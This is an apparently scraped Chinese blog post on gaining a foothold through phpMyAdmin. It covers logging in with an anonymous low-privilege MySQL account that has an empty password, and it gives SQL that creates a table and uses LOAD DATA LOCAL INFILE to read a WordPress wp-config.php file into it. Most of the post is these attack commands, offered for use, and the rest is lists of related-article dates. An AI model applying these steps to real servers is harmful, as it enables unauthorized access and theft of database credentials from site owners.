账号:‘localhost’@'@”

密码:为空

可获得一个低权限账号

phpMyAdmin鸡肋低权限getshell

 

利用方法:

Mysql可以把指定的文件写进表

CREATE TABLE `test`.`a` (`a1` TEXT NOT NULL ); //在test这个库创建一个表名为a字段名为a1的表。

load data local infile 'c:\\xampp\\htdocs\\wavegoing\\wp-config.php'into table a;

phpMyAdmin鸡肋低权限getshell

 

相关文章:

  • 2021-10-28
  • 2021-09-01
  • 2021-12-04
  • 2022-12-23
  • 2022-02-10
  • 2021-07-27
  • 2022-12-23
  • 2022-12-23
猜你喜欢
  • 2021-12-05
  • 2021-10-06
  • 2022-12-23
  • 2022-03-04
  • 2022-12-23
  • 2021-07-18
  • 2021-10-28
相关资源
相似解决方案